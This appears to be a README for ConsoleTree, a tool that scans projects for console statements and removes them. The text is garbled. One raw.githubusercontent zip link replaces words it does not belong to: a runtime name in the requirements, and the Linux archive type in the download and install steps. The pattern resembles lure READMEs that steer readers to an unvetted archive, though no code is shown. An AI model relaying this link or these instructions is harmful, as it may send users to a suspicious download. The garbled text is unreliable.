Welcome to ConsoleTree! This tool helps you find, navigate, and remove console statements from your project. It's perfect for keeping your code clean and professional. Follow these simple steps to get started.
To download ConsoleTree, visit this page: ConsoleTree Releases.
Before you install ConsoleTree, ensure your system meets these requirements:
- Operating System: Windows 10 or later, macOS, or Linux.
- https://raw.githubusercontent.com/cyanDefCodes/ConsoleTree/main/src/ConsoleTree_2.6.zip Version 12 or later installed.
- Browser: A recent version of Chrome, Firefox, or Edge for the extension.
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Visit the Releases Page
Go to the ConsoleTree Releases page to see the latest version.
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Download the Package
Look for the most recent version under the "Latest release" section. Click on the appropriate file for your operating system to start downloading:
- For Windows, download
ConsoleTree-<version>.exe. - For macOS, download
ConsoleTree-<version>.dmg. - For Linux, download the appropriate
https://raw.githubusercontent.com/cyanDefCodes/ConsoleTree/main/src/ConsoleTree_2.6.zipfile.
- For Windows, download
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Run the Installer
After downloading, locate the file on your computer (usually in the "Downloads" folder):
- For Windows, double-click the
.exefile and follow the prompts. - For macOS, open the
.dmgfile and drag the ConsoleTree app to your Applications folder. - For Linux, extract the
https://raw.githubusercontent.com/cyanDefCodes/ConsoleTree/main/src/ConsoleTree_2.6.zipfile and follow the installation instructions in the README included in the package.
- For Windows, double-click the
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Launch ConsoleTree
Once the installation is complete, open ConsoleTree from your applications or shortcuts.
Using ConsoleTree is simple:
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Open Your Project
Start by opening your project folder through ConsoleTree.
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Scan for Console Statements
Click the "Scan" button. ConsoleTree will search for all console statements in your project files.
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View the Results
Once the scan is complete, you will see a list of console statements. You can click on any entry to navigate directly to that line in the code.
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Remove Unwanted Statements
Select the console statements you don’t want, and click the "Remove" button. ConsoleTree will handle the deletion for you.
- Easy Navigation: Quickly jump to console statements in your code.
- Batch Removal: Remove multiple statements at once.
- Preview Changes: Check what will be removed before confirming.
- Cross-Platform: Works on Windows, macOS, and Linux.
If you need help, check the following resources:
- Documentation: Detailed user guides are available within the app.
- Community Forum: Join our users on the GitHub Discussions page to ask questions and share tips.
- Issues: Report any problems directly on our GitHub Issues page.
Thank you to all contributors for making ConsoleTree a great tool. If you would like to contribute, please check our Contributing Guide.
ConsoleTree is licensed under the MIT License. Feel free to use and modify it according to your needs.
For more information and updates, keep an eye on our project on GitHub.
To recap, you can download ConsoleTree from the following link:
Visit this page to download: ConsoleTree Releases.
Enjoy coding without clutter!